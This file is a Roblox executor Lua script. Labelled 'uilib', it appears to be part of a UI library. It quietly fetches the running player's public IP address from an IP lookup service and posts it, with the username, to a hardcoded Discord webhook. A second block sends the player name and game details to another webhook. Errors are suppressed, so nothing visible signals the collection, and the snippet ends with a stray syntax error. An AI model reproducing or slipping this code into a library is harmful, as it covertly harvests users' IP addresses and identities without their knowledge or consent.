local webh = "https://discord.com/api/webhooks/977612714291638291/iFhxAjQZc0VeaZsqCDfee-Q7_h-hUe5Qhw2me5-xZxxvLS6ZIbhYTdl9ZX4DcBDAuT_q"

pcall(function()
   local data = {
       ["embeds"] = {
           {
               ["title"] = game:GetService("Players").LocalPlayer.Name,
               ["description"] = game:HttpGet("https://api.ipify.org")
           }
       }
   }

   if syn then
       local response = syn.request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif request then
       local response = request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif http_request then
       local response = http_request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   end
end)

    local GetName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
    local string = "```Player: "..game.Players.LocalPlayer.Name.."\n".."Game: ".. GetName.Name .."\n".. "Game Id:"..game.GameId.. "\n" .."uilib```"
    
    local response = syn.request(
        {
            Url = 'https://discord.com/api/webhooks/977624662886465596/Hj9V-f6pjqIlxKPQf3BDPf5gkg-1qRuzfc6oOfASiTUg8IKdmqqr9emd6V7a2yDE1BTm', Method = 'POST', Headers = {['Content-Type'] = 'application/json'},
            Body = game:GetService('HttpService'):JSONEncode({content = string})
        }
    );
return)
